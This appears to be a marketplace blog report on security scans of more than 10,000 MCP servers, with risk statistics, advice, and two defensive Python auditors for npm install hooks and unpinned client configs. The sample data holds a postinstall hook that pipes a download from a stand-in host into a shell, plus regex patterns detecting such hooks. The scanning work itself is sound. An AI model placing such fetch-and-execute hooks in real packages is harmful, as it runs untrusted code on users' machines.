Updated June 24, 2026

How Safe Are MCP Servers? We Scanned Over 10,000

We security-scanned more than 10,000 MCP servers. About 1 in 4 scores above low risk, 1 in 8 has a critical finding, and nearly 1 in 3 has a serious supply-chain issue. Here is the full data.

Key takeaways

  • We scanned more than 10,000 MCP servers. About 1 in 4 scores above low risk, and nearly 1 in 3 has a serious supply-chain issue.
  • Supply-chain risk is the single biggest problem, far ahead of any other category. The danger is usually what a server pulls in, not its own code.
  • Most servers are safe and easy to find: about three quarters scan clean. Check the security score before installing.

Short answer: most MCP servers are reasonably safe, but a meaningful minority are not. MCP servers are the plug-in tools that extend AI assistants like Claude and ChatGPT. Across more than 10,000 of them we scanned, about 1 in 4 scores above low risk, roughly 1 in 8 carries at least one critical-severity finding, and nearly 1 in 3 has a serious supply-chain issue. The average server scores 8.0 out of 10, where higher is safer. The risk is real but concentrated, which means the useful question is not "are MCP servers safe" in general, it is "is this specific server safe," and that is answerable.

This is the first public dataset we know of at this scale. Every server listed on MCP Marketplace is automatically security-scanned before it goes live, so we sit on security results for the broad MCP ecosystem rather than a handful of hand-picked examples. Here is what that data says.

Risk distribution across 10,000+ scanned MCP servers: 74.9% low risk, 11.5% moderate, 11.2% high, 2.5% critical. One in four servers is not a clean install.

How many MCP servers are actually safe?

Here is the full risk breakdown across every scanned server, as of June 2026.

| Risk level | Share of servers | What it means |
| --- | --- | --- |
| Low | 74.9% | Clean scan, no serious findings |
| Moderate | 11.5% | Minor issues worth a look before installing |
| High | 11.2% | Serious findings, install with caution |
| Critical | 2.5% | Severe findings, review carefully before use |

The headline is the 25% on the other side of "low." One in four MCP servers is not a clean install. About 13.7% land in the high or critical risk tier overall. A wider 11.9% (roughly 1 in 8) carry at least one critical-severity finding even when their other checks pull the overall score higher, so the share of servers with a serious individual problem is larger than the 2.5% critical tier alone suggests.

That matters more for MCP than for a typical package, because an MCP server is not a passive dependency. Once connected, it runs with access to the tools, files, and data your AI assistant can reach. A risky MCP server is closer to handing someone a key than to importing a library.

What is the single biggest risk in MCP servers?

Supply-chain risk, and it is not close. Nearly 1 in 3 scanned servers (31.8%) has a high or critical supply-chain finding, far ahead of every other category we track.

Ranked by how often each category produces serious findings:

| Risk category | Relative prevalence | Plain-English version |
| --- | --- | --- |
| Supply chain | Highest by a wide margin | Untrusted or unverifiable code and dependencies in the install path |
| Package verification | Common | Published package does not cleanly match its stated source |
| Code vulnerabilities | Moderate | Exploitable patterns in the server's own code |
| Remote trust | Moderate | Hosted servers whose endpoint or operator is hard to verify |
| Remote protocol | Lower | Transport or protocol handling that does not follow the spec |

The takeaway for anyone installing MCP servers: the danger is usually not a dramatic exploit in the server's own code. It is what the server pulls in and runs on your machine, and whether the thing you are installing is really the thing the author published. Those are exactly the questions a casual look at a GitHub repo will not answer.

What does a "critical" MCP server look like?

The critical-risk servers in our data tend to share a profile rather than a single smoking gun: unverifiable packages, dependencies from untrusted sources, and install steps that quietly fetch and execute remote code. Many look completely normal at install time. Source code can read as routine while the actual risk sits one layer down in what gets pulled in, or in an update that lands after you have already approved the tool.
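To make "one layer down" concrete, here is an added example (not the MCP Marketplace scanner, and not code from this report) that checks the install hooks of every package in an npm dependency tree for fetch-and-execute patterns. The package names, the sample tree and the three heuristics are constructed for illustration.

```python
import re

# Lifecycle hooks npm can run automatically as part of an install.
LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")

# Heuristic patterns (assumptions for this example, not an exhaustive rule set).
PATTERNS = {
    "pipes a download into a shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
    "inline interpreter code": re.compile(
        r"\b(node\s+(-e|--eval)|python3?\s+-c)\b"),
    "hard-coded URL": re.compile(r"https?://", re.I),
}

# Constructed sample: parsed package.json files keyed by their path on disk.
SAMPLE_TREE = {
    "package.json": {
        "name": "example-mcp-server",
        "scripts": {"build": "tsc", "start": "node dist/index.js"}},
    "node_modules/helper-a/package.json": {
        "name": "helper-a",
        "scripts": {"postinstall":
                    "curl -s https://cdn.example.invalid/setup.sh | sh"}},
    "node_modules/helper-b/package.json": {
        "name": "helper-b",
        "scripts": {"install": "node-gyp rebuild"}},
    "node_modules/helper-c/package.json": {
        "name": "helper-c",
        "scripts": {"preinstall": "node -e \"require('./fetch')()\""}},
}

def audit_install_scripts(packages):
    """Return sorted (path, hook, reason) for install hooks worth reviewing."""
    findings = []
    for path, manifest in packages.items():
        scripts = manifest.get("scripts") or {}
        for hook in LIFECYCLE:
            cmd = scripts.get(hook)
            if not isinstance(cmd, str):
                continue
            for reason, rx in PATTERNS.items():
                if rx.search(cmd):
                    findings.append((path, hook, reason))
    return sorted(findings)

if __name__ == "__main__":
    for finding in audit_install_scripts(SAMPLE_TREE):
        print(*finding, sep=" | ")
```

The server's own manifest comes back clean here; both findings sit in dependencies, which is the pattern the paragraph above describes.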

That delay is the hard part. A server can be clean the day you install it and change later, which is why a point-in-time glance is weak protection and why we re-scan continuously rather than once at submission.

How we scanned them

Every server submitted to or imported into MCP Marketplace runs through an automated security scan before it is listed, and gets re-scanned over time. The scan evaluates several independent risk categories, including the supply-chain, package-verification, code-vulnerability, and remote-trust dimensions above, and produces a single 0 to 10 security score plus a categorized list of findings.

The numbers in this report cover more than 10,000 scanned servers across the live catalog as of June 2026, drawn from the official MCP Registry and direct creator submissions rather than a hand-picked set. They describe the public MCP ecosystem roughly as it actually ships. We are publishing the aggregate results, not the detection internals, so the picture is honest without handing a playbook to anyone trying to slip past a scan.

What this means if you use MCP servers

Three practical conclusions fall out of the data.

  1. Do not assume safety from popularity or a clean-looking repo. A third of servers have a serious supply-chain issue that a quick read will miss, and the riskiest ones often look fine on the surface.
  2. Treat installing an MCP server like granting access, not adding a library. It runs where your AI assistant runs. The bar should be higher.
  3. Lean on a security score and re-scanning instead of a one-time check. The real exposure often shows up in dependencies and in later updates, not in the code you skim on day one.
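One check that follows from points 2 and 3, as an added example rather than anything from the scanner behind this report: audit an MCP client configuration for servers launched through a package runner without an exact version, since those entries can start running a different release after you approved them. It assumes the `mcpServers` / `command` / `args` layout used by several MCP clients; the server and package names are constructed.

```python
import re

LAUNCHERS = {"npx", "uvx", "bunx"}  # runners that fetch a package at launch
EXACT = re.compile(r"^\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?$")

# Constructed sample configuration.
SAMPLE_CONFIG = {"mcpServers": {
    "files":  {"command": "npx",
               "args": ["-y", "@example/fs-server", "/home/me/docs"]},
    "search": {"command": "npx", "args": ["-y", "example-search-mcp@latest"]},
    "notes":  {"command": "uvx", "args": ["example-notes-mcp@2.4.1"]},
    "local":  {"command": "node", "args": ["/opt/mcp/local/index.js"]},
}}

def split_spec(spec):
    """'@scope/pkg@1.2.3' -> ('@scope/pkg', '1.2.3'); no version -> (spec, None)."""
    name, _, version = spec.rpartition("@")
    return (name, version) if name else (spec, None)

def audit_mcp_config(config):
    """Return sorted (server, issue) pairs for unpinned package-runner entries."""
    issues = []
    for server, entry in config.get("mcpServers", {}).items():
        if entry.get("command") not in LAUNCHERS:
            continue
        # Simplification: the first non-flag argument is the package spec.
        spec = next((a for a in entry.get("args", [])
                     if not a.startswith("-")), None)
        if spec is None:
            continue
        name, version = split_spec(spec)
        if version is None:
            issues.append((server, f"{name}: no version pinned"))
        elif not EXACT.match(version):
            issues.append((server, f"{name}: '{version}' is not an exact version"))
    return sorted(issues)

if __name__ == "__main__":
    for server, issue in audit_mcp_config(SAMPLE_CONFIG):
        print(f"{server}: {issue}")
```

Pinning the top-level version does not pin its transitive dependencies, so this check complements scanning rather than replacing it.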

The good news is that the safe majority is large and easy to find. About three quarters of servers scan clean, you can filter directly to them, and because we re-scan continuously, those scores stay current rather than freezing at install time.

Browse security-scanned MCP servers, sorted by security score

If you want the deeper background on the threat itself, see our explainer on whether MCP servers are safe.


Methodology: figures reflect automated security scans of the live MCP Marketplace catalog as of June 2026, covering more than 10,000 listed servers (those in approved or publicly flagged status). Risk levels and the 0 to 10 security score, where higher is safer, are produced by our automated scanner. We report aggregate results only, and percentages are rounded so they may not total exactly 100.
